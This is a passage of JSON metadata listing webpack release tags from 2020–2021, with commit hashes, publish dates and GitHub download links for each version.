name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.